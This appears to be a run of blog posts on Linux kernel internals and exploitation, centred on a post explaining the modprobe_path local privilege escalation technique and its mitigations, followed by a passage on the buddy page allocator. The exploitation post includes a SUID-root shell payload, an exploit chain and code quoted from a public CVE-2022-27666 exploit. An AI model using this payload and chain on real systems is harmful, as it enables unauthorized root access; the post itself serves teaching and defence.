linux-insides by 0xAX is a great low-level dive into some linux internals and was an inspiration for my own linternals series :)
LWN.net
sam4k/linux-kernel-resources is my attempt to curate some useful kernel tidbits related to compiling, debugging, instrumenting and patching the linux kernel

Tools

bootlin’s elixr cross referencer for linux source; great for browsing different kernel versions with references & defs in the browser
Doom Emacs, my current IDE setup
hugsy/gef (GDB Enhanced Features), an addon for GDB to improve RE/xdev workflow

Video Materials

Black Hat (YouTube)
DEFCONConference (Youtube)
Hack In The Box Security Conference (YouTube)
OffensiveCon (YouTube)

Wrapping Up

Oof, that was a long one, huh? Unlike my other posts, this one has covered a particularly subjective topic. Typically the content of my posts is derived from some objective source like the Linux kernel, however this one has ultimately been the culmination of my own experiences, understanding and journey into linux vred.

That said, I hope that at least some of the insights I’ve shared today have been useful for you. Not everything I’ve talked about will apply to everyone, but fingers crossed there’s some helpful nuggets of information in there for each of you.

As always, I love to talk about this stuff and it means a lot to be able to help inspire and motivate people on their linux-y vred-y journeys. If you have any questions, suggestions or corrections then feel free to @ me or DM me on Twitter :)

Change History

I have a feeling this will see some updates and additions, so stay tuned here for any updates to the post.

exit(0);

Kernel Exploitation Techniques: modprobe_path

sam4k — Mon, 04 Jul 2022 14:54:17 +0000

I thought we’d kick things off with a modern day staple for local privilege escalation (LPE) in Linux Kernel Exploitation, modprobe_path.

The aim of this series on exploitation techniques is to provide byte-sized (lol, sorry) analyses on specific techniques and primitives used in kernel exploitation.

Focusing on explaining why and when these techniques are used, how they work and finally touching on existing, upcoming or speculative mitigations.

Overview
Diving In
- The Code
- A Pseudo Case-Study
  - Actual Examples
    - CVE-2022-27666 by @Etenal7
- Mitigations
  - So We’re All Good?
  - Alternatives
Conclusion

Overview

[modprobe](https://linux.die.net/man/8/modprobe) is a userspace program for adding and removing modules from the Linux kernel. When the kernel needs a feature that currently isn’t loaded into the kernel, it can use modprobe to load in the appropriate module.

One example of this is when a userspace process [](https://man7.org/linux/man-pages/man2/execve.2.html)[execve()](https://linux.die.net/man/3/execve)’s a binary:

the kernel will look for the appropriate binary loader
if the binary’s header isn’t recognised, it will attempt to load the appropriate module, specifically binfmt-AABBCCDD, where AABBCCDD represent the first 4 bytes of the binary in hex
the kernel will attempt to load the module via modprobe, running it as root via the absolute path stored in the titular exported kernel symbol modprobe_path

With an arbitrary address write (AAW) primitive, and address of the modprobe_path symbol, an attacker can overwrite modprobe_path to malicious binary X.

Then, by creating and executing a binary with a unknown header[1], an unprivileged attacker can cause the kernel to go through steps 1-3 above.

Except this time, it runs the the overwritten modprobe_path as root, letting the attacker run malicious binary X as root, allowing for LPE.

Specifically, as we’ll explain later, it needs to be 4 non-[printable()](https://elixir.bootlin.com/linux/v5.18.3/source/fs/exec.c#L1698) bytes that aren’t already supported header formats

Diving In

Now that we’ve got a high level overview of what we’re dealing with, let’s dive into some technical details as we explore the code path to executing modprobe_path, usecases for this techniques and how it can be leveraged by attackers. Finally we’ll cover mitigations.

The Code

When we call the execve() family in userspace, directly or indirectly (such as running a program in your shell), it ultimately makes its way to the kernel via the [execve](https://man7.org/linux/man-pages/man2/execve.2.html) syscall:

SYSCALL_DEFINE3(execve,
		const char __user *, filename,
		const char __user *const __user *, argv,
		const char __user *const __user *, envp)
{
	return do_execve(getname(filename), argv, envp);
}

fs/exec.c (v5.18.5)

We’ll not get too bogged down in how programs actually get run in Linux, there plenty of great content out there on the topic[1].

What we’re interested in is the fact that in order to the execute the program specified by filename, the kernel needs to understand what it’s trying to execute.

As mentioned earlier, part of this process involves [search_binary_handler(struct linux_binprm *bprm)](https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L1702), where [struct linux_bprm](https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L18) is the binary parameter struct which is used by is used by the kernel to “hold the arguments that are used when loading binaries”[2].

[#0] search_binary_handler(...)
[#1] exec_binprm(...)
[#2] bprm_execve(...)
[#3] do_execveat_common(...)
[#4] do_execve(...)
[#5] SYSCALL_DEFINE3(execve,...) 
[#6] userspace makes execve() syscall

Pseudo-backtrace up to search_binary_handler()

As per the source comments, this function “cycle[s] the list of binary formats handler, until one recognizes the image”. These binary format handlers are represented by [struct linux_binfmt](https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L85) and are stored in the doubly linked list, [formats](https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L82).

static int search_binary_handler(struct linux_binprm *bprm)
{
	bool need_retry = IS_ENABLED(CONFIG_MODULES);
	struct linux_binfmt *fmt;
	int retval;
    
	...
 retry:
	read_lock(&binfmt_lock);
	list_for_each_entry(fmt, &formats, lh) {
		if (!try_module_get(fmt->module))
			continue;
		read_unlock(&binfmt_lock);

		retval = fmt->load_binary(bprm);

		read_lock(&binfmt_lock);
		put_binfmt(fmt);
		if (bprm->point_of_no_return || (retval != -ENOEXEC)) {
			read_unlock(&binfmt_lock);
			return retval;
		}
	}
	read_unlock(&binfmt_lock);

	if (need_retry) {
		if (printable(bprm->buf[0]) && printable(bprm->buf[1]) &&
		    printable(bprm->buf[2]) && printable(bprm->buf[3]))
			return retval;
		if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
			return retval;
		need_retry = false;
		goto retry;
	}

	return retval;
}

fs/exec.c (v5.18.5)

Looking at the code above, we can see that search_binary_handler() iterates over each binary format in formats [line 10]. As we iterate over each format, we see if that format’s load_binary()[3] implementation can process our bprm (which contains a buffer, data, of up to the first [BINPRM_BUF_SIZE](https://elixir.bootlin.com/linux/v5.18.5/source/include/uapi/linux/binfmts.h#L19) bytes of data from our executable) [line 15].

If we managed to load the binary, we can return successfully [line 21], otherwise if we’ve tried all the formats in format and CONFIG_MODULES [4] is is set, we hit the block starting line 27.

Then comes the check [line 27] we mentioned earlier: if each of the first 4 bytes of our executable are all printable(), we return here.

#define printable(c) (((c)=='\t') || ((c)=='\n') || (0x20<=(c) && (c)<=0x7e))

fs/exec.c (v5.18.5)

printable() is a simple macro that yields true if char c is an ASCII printable character (a tab, newline, space or other ASCII characters you see on your keyboard).

So, if the first four bytes of the binary contains one or more non-printable() bytes[5] then comes the interesting part [line 30]: the kernel will attempt to find the appropriate binary format handler by trying to load a module of the expected name “binfmt-WXYZ”, where WXYZ are the hex representation of the first four bytes of our executable.

For reference we can find the following modules in the kernel (where - and _ are interchangable in module names): binfmt_elf, binfmt_script, binfmt_aout. If we tried to execve() a binary whose first for bytes were 0xFFFFFFFF, the kernel thread handling the execve() syscall would ultimately reach line 30 and try to request_module("binfmt-FFFFFFFF").

If we take a look at how request_module() is implemented, we can see that it is actually a macro for _request_module():

int __request_module(bool wait, const char *name, ...);
#define request_module(mod...) __request_module(true, mod)

include/linux/kmod.h (v5.18.5)

By taking a look at _request_module() we can see that after carrying out the necessary sanity and security checks, that it ultimately calls call_modprobe() [line 29]:

/**
 * __request_module - try to load a kernel module
 * @wait: wait (or not) for the operation to complete
 * @fmt: printf style format string for the name of the module
 * @...: arguments as specified in the format string
 ...
 * If module auto-loading support is disabled then this function
 * simply returns -ENOENT.
 */
int __request_module(bool wait, const char *fmt, ...)
{
	va_list args;
	char module_name[MODULE_NAME_LEN];
	int ret;

    ...
	if (!modprobe_path[0])
		return -ENOENT;

    ...
	if (ret >= MODULE_NAME_LEN)
		return -ENAMETOOLONG;

	ret = security_kernel_module_request(module_name);
	if (ret)
		return ret;

    ...
	ret = call_modprobe(module_name, wait ? UMH_WAIT_PROC : UMH_WAIT_EXEC);
    ...
}

kernel/kmod.c (v5.18.5)

Finally (we’re almost there, I promise!) we reach call_modprobe(). I’ll avoid spamming you with more source, but for context, [call_usermoderhelper_setup()](https://www.kernel.org/doc/htmldocs/kernel-api/API-call-usermodehelper-setup.html) [line 25] prepares the kernel to “call a usermode helper”, which for us right now essentially means running an executable in userspace as root. [call_usermodehelper_exec()](https://www.kernel.org/doc/htmldocs/kernel-api/API-call-usermodehelper-exec.html) [line 30] then does the job.

static int call_modprobe(char *module_name, int wait)
{
	struct subprocess_info *info;
	static char *envp[] = {
		"HOME=/",
		"TERM=linux",
		"PATH=/sbin:/usr/sbin:/bin:/usr/bin",
		NULL
	};

	char **argv = kmalloc(sizeof(char *[5]), GFP_KERNEL);
	if (!argv)
		goto out;

	module_name = kstrdup(module_name, GFP_KERNEL);
	if (!module_name)
		goto free_argv;

	argv[0] = modprobe_path;
	argv[1] = "-q";
	argv[2] = "--";
	argv[3] = module_name;	/* check free_modprobe_argv() */
	argv[4] = NULL;

	info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
					 NULL, free_modprobe_argv, NULL);
	if (!info)
		goto free_module_name;

	return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
	...
}

On lines 19-23 you can see the argument vector we’re using. So in our current context of a typical Linux system these days, trying to execute a binary beginning 0xFFFFFFFF, as an unprivileged user we’d ultimately be running the bash equivalent of:

root# /usr/bin/modprobe -q -- binfmt-FFFFFFFF

Where /usr/bin/modprobe is the value found in the kernel symbol modprobe_path.

What’s important here is that the binary being executed in this root process is defined by the value of the kernel symbol modprobe_path.

A Pseudo Case-Study

To recap what we’ve covered so far:

An unprivileged user can create a binary starting 0xFFFFFFFF and try to execve() it, causing the kernel to create a root process running the equivalent of $modprobe_path -q -- binfmt-FFFFFFFF, where $modprobe_path here is the value stored in the kernel symbol modprobe_path
As a result, if an attacker can control modprobe_path then they can control the binary being executed by the root process

Wait, so we need to overwrite a kernel symbol? If we can already do that haven’t we already won?! Valid questions! The kernel is vast and complex, as such so is kernel exploitation - there are many types of bugs and ways to achieve privilege escalation.

Similarly, the motivations and goals of attackers varies. As we’re looking at LPEs, let’s assume the goal here is to go from unprivileged user to having root access.

Take this (very) simplistic view where we have a kernel memory corruption vulnerability, such as a heap buffer overflow. Ideally, we’re able to leverage this to gain a control flow hijacking primitive (CFHP), where we can influence the flow of kernel code execution; say we manage to use our overflow to corrupt a pointer[6] and go from there.

If we can use our CFHP to overwrite arbitrary kernel addresses, we can use the modprobe_path technique we’ve talked about to make the final pivot from kernel code execution to having root access in userspace (which is much more usable lol).

How, you ask? Well, first things first let’s take a look at an example of a typical binary we can overwrite & point modprobe_path to:

int main()
{
    system("cp /usr/bin/sh /tmp/sh");
    system("chown root:root /tmp/sh");
    system("chmod 4755 /tmp/sh");
}

This payload sets the owner of /tmp/sh as root [4], and then gives it the SUID bit [6].

This bit means that regardless of runs the file, it runs with the owners permissions. In this instance,, if a user runs /tmp/sh after this, it will get a root shell[7].

So, to wrap our pseudo case-study up, our overall exploit chain might look like this:

Create a binary (e.g. /tmp/trigger) to trigger the execution of modprobe_path as root via the kernel’s usermodehelper, by starting it with bytes 0xFFFFFFFF
Compile & place the payload from the snippet above (e.g. /tmp/pwn)
Trigger our arbitrary address write (e.g. via some kernell mem corruption bug), using the AAW primitive to overwrite modprobe_path with our payload, /tmp/pwn
Execute /tmp/trigger, which will cause the kernel to run /tmp/pwn (the new value of modprobe_path) as root
As an unprivileged user we can now get a root shell by running /tmp/sh which is now a SUID executable owned by root

Actual Examples

So we’ve covered a hasty pseudo-case study of how an attacker might use this modprobe_path technique to escalate privileges via a kernel AAW. Below are a few recent real-world write-ups and examples of this technique put to use:

CVE-2022-27666 by @Etenal7

I’ve actually retroactively added this section after finishing the post, figuring it can’t hurt to explore some real-world exploit code making use of this technique.

So using what we’ve learnt so far, particularly from our pseudo-case study, let’s see how @Etenal7 makes use of this technique in their exploit (repo here).

To read more on the memory corruption side of things and how they get an AAW primitive to be able to overwrite modprobe_path, check out the awesome write-up. The tl;dr is they exploit a 8-page heap overflow (CVE-2022-27666), do some neat heap feng shui with the page allocator and the slab allocator, to ultimately gain a KASLR leak and AAW primitive.

Diving in, first of all we can see a similar payload in the file [get_rooot.c](https://github.com/plummm/CVE-2022-27666/blob/main/get_rooot.c):

#include 
#include 

int main()
{
    system("chown root:root /tmp/myshell");       [0]
    system("chmod 4755 /tmp/myshell");            [1]
    system("/usr/bin/touch /tmp/exploited");      [2]
}

get_rooot.c

Besides creating a root owned [0] SUID [1] shell, they also create a marker file /tmp/exploited to easily check the payload has been run later [2].

Moving onto the core exploit logic, over in [poc.c](https://github.com/plummm/CVE-2022-27666/blob/main/poc.c), we can see the setup of the invalid binary used to eventually trigger modprobe_path:

...
#define PROC_MODPROBE_TRIGGER "/tmp/modprobe_trigger"
...
void modprobe_trigger()
{
  execve(PROC_MODPROBE_TRIGGER, NULL, NULL);
}
...
void modprobe_init()
{
  int fd = open(PROC_MODPROBE_TRIGGER, O_RDWR | O_CREAT);      [0]
  if (fd < 0)
  {
      perror("trigger creation failed");
      exit(-1);
  }
  char root[] = "\xff\xff\xff\xff";                            
  write(fd, root, sizeof(root));                               [1]
  close(fd);
  chmod(PROC_MODPROBE_TRIGGER, 0777);                          [2]
}

poc.c

We can see they programmatically create the modprobe_path trigger in modprobe_init(), creating an executable [2] at path PROC_MODPROBE_TRIGGER [0] which simply consists of an invalid 4 byte header, "\xff\xff\xff\xff" [1].

This can later be triggered to make the kernel execute, the hopefully overwritten,modprobe_path via modprobe_trigger().

Below I’ve highlighted the code responsible for performing the AAW, triggering the corrupted modprobe_path and finally popping the payload:

char *evil_str = "/tmp/get_rooot\x00"; [0] (from fuse_evil.c)
...
void overwrite_modprobe()
{
  void *modprobe_path = addr_modprobe_path + kaslr_offset; [1]
  ...

    ...
    arb_write(modprobe_path-8, strlen(evil_str), ...);     [2]
    ...
    sleep(1);
    modprobe_trigger();                                    [3]
    sleep(1);
    if (am_i_root()) {                                     [4]
      ...                                                  [5]
    }
    printf("[+] Not root, try again\n");
  }
  ...
}

int am_i_root()
{
  struct stat buffer;
  int exist = stat("/tmp/exploited", &buffer);
  if(exist == 0)
      return 1;
  else  
      return 0;
}

poc.c

First they use the leaked KALSR offset to work out the address of the modprobe_path kernel symbol [1]. Next, the AAW is triggered [2], overwriting the original value of modprobe_path with the path to the payload, /tmp/get_rooot [0].

Then, with modprobe_path hopefully overwritten, they call modprobe_trigger() [3] to execute tbe invalid binary so the kernel ultilmately executes the new modprobe_path.

Finally am_i_root() is called to check for success by looking for the marker file /tmp/exploited that is created when the payload /tmp/get_rooot is run by usermodehelper. If it exists, we can pop a shell [5].

Mitigations

Now we have an understanding of the technique, how it’s used to facilitate LPE and some examples of real-world usecases … how do we mitigate it?

CONFIG_STATIC_USERMODEHELPER was introduced in 4.11[8], back in 2017 by Greg KH[9], specifically to mitigate this kind of attack surface.

One Helper to Rule Them All

Looking at call_modprobe() earlier, the kernel specifies an executable path via call_usermodehelper_setup(path, ...) and then call_usermodehelper_exec() will execute the binary specified by path. Relevant to us, is that modprobe_path is passed to call_usermodehelper_setup() and we can change modprobe_path.

With this config enabled, regardless of the path passed to call_usermodehelper_setup(), the kernel will only directly execute a single usermode binary defined by CONFIG_STATIC_USERMODEHELPER_PATH[10]. This path is read-only, so can’t be changed (without write protection bit flipping shenanigans[11]).

struct subprocess_info *call_usermodehelper_setup(const char *path, ...)

{
	struct subprocess_info *sub_info;
	...
    
#ifdef CONFIG_STATIC_USERMODEHELPER
	sub_info->path = CONFIG_STATIC_USERMODEHELPER_PATH;
#else
	sub_info->path = path;
#endif

	...
}

kernel/umh.c (v5.18.5)

It is then the task of the static executable defined by CONFIG_STATIC_USERMODEHELPER_PATH to call the appropriate usermode helper, e.g. /usr/bin/modprobe.

Alternatively, CONFIG_STATIC_USERMODEHELPER can be enabled but CONFIG_STATIC_USERMODEHELPER_PATH can be set to "", disabling all usermode helper programs entirely; completely mitigating the modprobe_path technique.

So We’re All Good?

Awesome, you mean this whole thing was patched back in 2017? EZ PZ, next technique pls. Not so fast! Despite being introduced into the kernel back 4.11 it still hasn’t made it’s way into the default configurations for many popular distributions.

As of writing, this includes the latest versions of Ubuntu, Fedora and EndeavourOS; I’m sure there’s many more but that’s all I know off the top of my head.

You can check your system by searching your config, typically in/boot/config... or /proc/config, for CONFIG_STATIC_USERMODEHELPER. Alternatively I heartily recommend @a13xp0p0v’s kconfig-hardened-check.

I don’t mean to point fingers though, the Linux ecosystem is vast and complex, with many moving parts and users. I can imagine there’s plenty of components that make assumptions about/rely on usermodehelper, making removing it outright (via not setting CONFIG_STATIC_USERMODEHELPER_PATH) difficult?

The alternative is to implement the single usermode helper, in such as a way as to securely carry out the same functionality for users of usermodehelper while still mitigating similar attack surfaces and not introducing new ones.

Alternatives

CONFIG_STATIC_USERMODEHELPER isn’t the only way to mitigate this technique, but it is one of the more direct, having been designed with this attack surface in mind.

From the code analysis earlier, some of you will also have noticed the more heavy handed approach of disabling CONFIG_MODULES entirely, preventing the request_module() code path from being reachable entirely, or any module loading for that matter - certainly an effective mitigation.

However, this approach suffers the same issue (though to a greater extent) as disabling usermodehelper, in that it’s gonna remove a pretty integral feature that many aspects of modern distros for your average user have come to make use of.

That’s not to say there isn’t an argument for disabling autoloading, reducing a broader attack surface than CONFIG_STATIC_USERMODEHELPER; it all depends on use case.

http://www.vishalchovatiya.com/program-gets-run-linux/
From the comment above [struct linux_binprm](https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L18) definition
e.g. load_elf_binary(), load_script()
CONFIG_MODULES enables loadable module support, without this we can’t modprobe new modules into the kernel
I believe the intention behind this check is to ignore invoking request_module() for plain-text files (that haven’t already been picked up by binfmt_script at this point), under the assumption other binary formats will have at one non-printable byte.
If KASLR is present we also need an information leak, to know the address of kernell symbols, e.g. modprobe_path in order to rewrite it
https://www.redhat.com/sysadmin/suid-sgid-sticky-bit
https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64e90a8acb8590c2468c919f803652f081e3a4bf
https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER_PATH.html
Which while doable, shifts the requirements from arbitrary kernel address write to a very lenient ROP chain or some kernel shellcode execution

Conclusion

Not gonna lie, I thought this series might be an opportunity for me to whack out some shorter <1000 word posts, but alas. Regardless, hopefully I’ve given you some useful insights and an understanding into a popular technique used in kernel exploit development to achieve local privilege escalation on modern kernels.

Although an effective mitigation exists within the kernel, this doesn’t protect anyone unless it’s enabled in the kernel configuration. This technique is particularly popular among attackers, as it’s a relatively low maintenance technique, requiring the offset for only one kernel symbol: modprobe_path. Of course, you still need an AAW primitive.

Going forward, there’s plenty of more content for me to dive into. If you have anything in particular you’re eager for me to cover, feel free to @me.

Some ideas include tackling the various aspects of heap feng shui, ROP chains and its various sub-strands, broader approaches to exploiting various bug types such as use-after-frees, overflows etc. The list goes on and on! But that’s all for now.

exit(0);

LiKE: A Series on Linux Kernel Exploitation

sam4k — Mon, 04 Jul 2022 14:50:00 +0000

So you thought the Linternals series was hype? Get ready for the even SEO friendlier LiKE, a series on all things Linux kernel exploitation.

I just couldn’t help myself, despite spending my work days doing kernel exploit development, I’m just that keen that I want to also cover it on my personal blog.

Seriously though, I think it’s an extremely interesting topic for us to cover and will tie in nicely with the kernel internals knowledge we pick up from the Linternals series.

Highlighted well in P0’s recent post “The More You Know, The More You Know You Don’t Know”, I think there is value in sharing and educating industry on the methodology and techniques that are being used by attackers. Plus kernel stuff is just cool right?

In terms of actual content, there’s lots of scope for topics we can cover, and I’m happy to hear your thoughts and suggestions. I have a few different areas I’d like to cover:

Kernel exploitation techniques: often times kernel exploitation techniques are covered as part of a broader post on exploiting a particular bug, so I want to spend some time putting the spotlight on specific techniques - talking about when, why and how they’re used as well as covering existing, future or possible mitigations.
Perhaps also highlighting mitigations? Talking about existing or upcoming security mitigations and how they impact(ed) the kernel exploitation space
Classic kernel writeups: whether CTFs or real world PoCs, I’m happy to spend some time providing technical coverage/analysis of cool stuff if that content isn’t already out there

Feel free to fire any questions, suggestions or *gasp* corrections my way @sam4k.

~~Similar to the Linternals post, going forward I’ll keep this up-to-date as a sort of table of content for published posts in the LiKE series.~~

I’ve since moved the contents to a standalone page, which you can reach from the navigation bar at the top, to keep things a bit more organised!

exit(0);

Linternals: Introducing Memory Allocators & The Page Allocator

sam4k — Fri, 10 Jun 2022 16:30:00 +0000

I know you’ve all been waiting for it, that’s right, we’re going to be taking a dive into another exciting aspect of Linux internals: memory allocators!

Don’t worry, I haven’t forgotten about the virtual memory series, but today I thought we’d spice things up and shift our focus towards memory allocation in the Linux kernel. As always, I’ll aim to lay the groundwork with a high level overview of things before gradually diving into some more detail.

In this first part (of many, no doubt), we’ll cover the role of memory allocators within the Linux kernel at a high level to give some general context on the topic. We’ll then take a look at the first of two types of allocator used by the kernel: the buddy (page) allocator.

We’ll cover the high level implementation of the buddy allocator, with some code snippets from the kernel to complement this understanding, before diving into some more detail and wrapping things up by talking about some pros/cons of the buddy allocator.

0x01 So, Memory Allocators?
0x02 The Buddy (Page) Allocator
Next Time!

0x01 So, Memory Allocators?

Alright, let’s get stuck in! Like I mentioned, we’ll start with the basics - what is a memory allocator? I could just say we’re talking about a collection of code which looks to manage available memory, typically providing an API to allocate() and free() this memory.

But what does that mean? For a moment let’s forget about the complexities of modern day memory management in OS’s, with all the various interconnected components:

Picture a computer with some physical memory, running a Linux kernel and a lot of usermode processes (think of all the chrome tabs). Both the kernel and the various user processes require physical memory to store the various data behind the virtual mappings we covered in parts 2 & 3 of the virtual memory series.

Now picture the absolute chaos as processes are using the same physical memory addresses at the same time, clobbering each other’s data, oh lord, even the kernel’s data is getting overwritten? Is that chrome tab even using a physical address that exists?!

That is where the kernel’s memory allocator comes in, acting as a gatekeeper of sorts for allocating memory when it is needed. It’s job is to keep track of how much memory there is, what’s free and what’s in use.

Rather than every process for themselves, if something requires a chunk of memory to store stuff in, it asks the memory allocator - simple enough right?

0x02 The Buddy (Page) Allocator

Now we’ve got a high level understanding of memory allocators, let’s take a look at how memory is managed and allocated in the Linux kernel.

While several implementations for memory allocation exist within the Linux kernel, they mainly work on top of the buddy allocator (aka page allocator), making it the fundamental memory allocator within the Linux kernel.

Page Primer

At this point, we should probably rewind and clarify what exactly a “page” is. As part of it’s memory management approach, the Linux kernel (along with the CPU) divides virtual memory into “pages” which are [PAGE_SIZE](https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18) bytes of contiguous virtual memory.

Typically defined as 0x1000 bytes, or 4KB, pages are the common unit for managing memory in the Linux kernel. This is why you’ll often see things in memory aligned on page boundaries, for example.

Anyway, while a fascinating topic, I’ll not derail us too much! However this is definitely something I’ll touch on in more detail in future posts, so don’t worry :)

❗

Going forward, unless I’m explicit, in examples using PAGE_SIZE, I’ll assume a typical PAGE_SIZE of 0x1000.

Buddy System Algorithm

Back to the topic at hand - we’ve covered where the “page” in page allocator comes from, what about the buddy part? Queue the buddy system algorithm (BSA) behind the buddy allocator, starting with the basics:

The buddy allocator tracks free chunks of physically contiguous memory via a freelist, [free_area[MAX_ORDER]](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L632), which is an array of [struct free_area](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L108).

Each struct free_area in the freelist contains a doubly linked circular list (the [struct list_head](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/types.h#L178)) pointing to the free chunks of memory.

...
struct free_area        free_area[MAX_ORDER]; 
...

struct free_area {
    struct list_head    free_list; 
    unsigned long       nr_free;
};

simplified from /include/linux/mmzone.h

Each struct free_area’s linked list points to free, physically contiguous chunks of memory which are all the same size. The buddy allocator uses the index into the freelist, free_area[], to categorise the size of these free chunks of memory.

This index is called the “order” of the list, such that the size of the free chunks of memory pointed to are of size 2order * [PAGE_SIZE](https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18), such that:

free_area[0] points to a struct free_area whose free_list contains a list of free chunks of physically contiguous memory; each being 20 * 0x1000 bytes == 0x1000 bytes AKA order-0 pages.
free_area[1] points to a struct free_area whose free_list contains a list of free chunks of physically contiguous memory; each being 21 * 0x1000 bytes == 0x2000 bytes AKA order-1 pages.
…
free_area[[MAX_ORDER](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L28)] -> points to a struct free_area whose free_list contains a list of free chunks of physically contiguous memory; each being 2MAX_ORDER * 0x1000 bytes

Okay, what’s this got to do with buddies Sam?! Good question! One that brings us onto how the buddy allocator (de)allocates all this free memory it tracks.

Being the buddy allocator, it provides an API for users to both allocate and free all these various sized, physically contiguous chunks of memory. If we want to call the equivalent of allocate(0x4000 bytes), what does this look like at a high level?

Determine what order-n page satisfies the size of our allocation, in maths world, they do this via log stuff: log2(alloc_size_in_pages), rounded up to the nearest int, will give us the appropriate order! Here, it’s 2.
As the order is also the index into the freelist, we can check the corresponding free_area[2]->free_list to find a free chunk. If there is one, hoorah! We dequeue it from the list as it’s no longer free and we can tell the caller about their newly acquired memory
However, if free_area[2]->free_list is empty, the buddy allocator will check the free_list of the next order up, in this case free_area[3]->free_list. If there’s a free chunk, the allocator will then do the following:

Remove the chunk from free_area[3]->free_list
Half the chunk (as any order-n page is guaranteed to be exactly twice the size of the order-n-1 page, as well as being physically contiguous in memory), creating two buddies! (I told you we’d get round to it!)
One chunk is returned to the caller who requested the allocation, while the other chunk is now migrated to the order-n-1 list, free_area[2]->free_list in this case
On freeing, the allocator will check for physically adjacent, free chunks (buddies!) to remerge to higher orders if a free_list has too many freed chunks

that’s right, i made a gif

If free_area[3]->free_list is also empty, the allocater will continue to check the higher order freelists until either it finds a free chunk or the request fails (if there are no free chunks in any of the higher orders either).

And there we are, a grossly-simplified (as always) overview of the buddy allocator within the Linux kernel. Perhaps I made a mistake intertwining code snippets and kernel specifics with a simplified approach, but hopefully it all made sense!

Nodes, Zones & Memory Stuff

Okay, so we’ve covered things at a fairly high level, but I’d be remiss if I didn’t clarify some of the specifics I glossed over in the last section, so buckle up.

First of all, in theme with our on going virtual memory series, let’s clarify what exactly is being allocated here. We already know we’re dealing with pages of memory, but where?

The buddy allocator is a virtual memory allocator, although it does so from the kernel region defined by __PAGE_OFFSET_BASE (aka lowmem aka physmap) which you’ll recall[1] is a 1:1 virtual mapping of physical memory. Such that lowmem address x+1 will map to physical address y+1, x+2 to y+2, x+N to y+N etc; virtually contiguous memory from this region is guaranteed also to be physically contiguous too.

Keeping things relatively brief again, the Linux kernel organises physical memory into a tree-like hierarchy of nodes made up of zones made up of pages frames[2]:

Nodes: these data structures, represented by [pg_data_t](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L934), are abstractions of actual physical hardware stuff, specifically a node represents a “bank” of physical memory
Zones: suffice to say nodes are made up of zones, represented by [struct zone](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L514), which represent ranges within memory
Page frames: zones are then page up of pages, represented by [struct page](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mm_types.h#L72). Where a page describes a fixed-length (PAGE_SIZE) contiguous block of virtual memory, a page frame is a fixed-length contiguous block of physical memory that pages are mapped to

Expanding on `free_area`

Why am I burdening you with this knowledge? The answer is because not only did I leave out some details in the code snippet above by I straight up altered it (it was for your own good, I swear), so now I’m going to correct my wrongs by unveiling the truth:

struct free_area {
    struct list_head    free_list[MIGRATE_TYPES]; 
    unsigned long       nr_free;
};

struct zone {
    ...
    /* free areas of different sizes */
    struct free_area    free_area[MAX_ORDER]; 
    ...
}

Okay, let’s unpack this. The buddy allocator actually keeps track of multiple freelists, free_area[], specifically one per zone. We can see that here, as the freelist is actually a member of the struct zone which we touched on a moment ago.

Why? Err, good question. I won’t delve into the nuances of NUMA/UMA systems and all that stuff but suffice to say when the buddy allocator is asked to allocate some memory, it may want to pick a zone from the node that is associated with the calling context (think “closest” node or most optimal).

Now that we have the full(ish) context, we can do a little bit of introspection and get some hands on using our ol’ faithful procfs:

$ cat /proc/buddyinfo 
----- zone info ------|    0   |  1   |  2   |  3   |  4   |  5   |  6   |  7   |  8   |  9   | 10  
-------------------------------------------------------------------------------------------------
Node 0, zone      DMA      0      0      0      0      0      0      0      0      1      1      2 
Node 0, zone    DMA32  11311   2358   1052    567    290    123     52     33     18     25      8 
Node 0, zone   Normal   5977    942   2093   1983    804    256     93     45     28     39      4

I’ve added some headers in (lines 2-3), but what we’re seeing here is a row for each zone’s buddy allocator freelist, free_area[MAX_ORDER]. The first column tells us the node and zone, then each column after that tells us how many free pages (nr_free) there are for each page order, starting from order 0 and moving to order MAX_ORDER. Neat, right?

Moving back to the deception, the doubly linked circular list we said pointed to all the free chunks? Well that’s actually an array of linked circular lists: free_list[MIGRATE_TYPES]. Don’t worry though, each list in the array still points to free chunks. Pages of different types, defined by the enum [MIGRATE_TYPES](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L67), are just stored in seperate lists in this array.

Touching on `struct page`

Although I’m planning to cover this in much more detail in the virtual memory series, I feel like it’s worth touching on this goliath as to fill in some gaps in our overview.

So we’ve already mentioned that each physical page (page frame) in the system has a [struct page](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mm_types.h#L72) associated with it. This tracks various metadata and is instrumental to the kernel’s memory management model.

Given that these represent physical pages, it might not come as a surprise to learn that the “free chunks” that free_area->free_list points to are actually references to page structs. We can see that here by poking around mm/page_alloc.c:

/*
 * Do the hard work of removing an element from the buddy allocator.
 * Call me with the zone->lock already held.
 */
static __always_inline struct page *
__rmqueue(struct zone *zone, unsigned int order, int migratetype,
						unsigned int alloc_flags)

Note the return type here, struct page * (we also see familiar qualifiers: zone, order, migrate type and flags)

Okay, whew, with that all cleared up, I think we have a reasonable overview of the buddy allocator within the Linux kernel! Hope you’re still with me as we’re not done yet!

https://sam4k.com/linternals-virtual-memory-part-3/
More on the topic here https://www.kernel.org/doc/gorman/html/understand/understand005.html

Using The Buddy Allocator

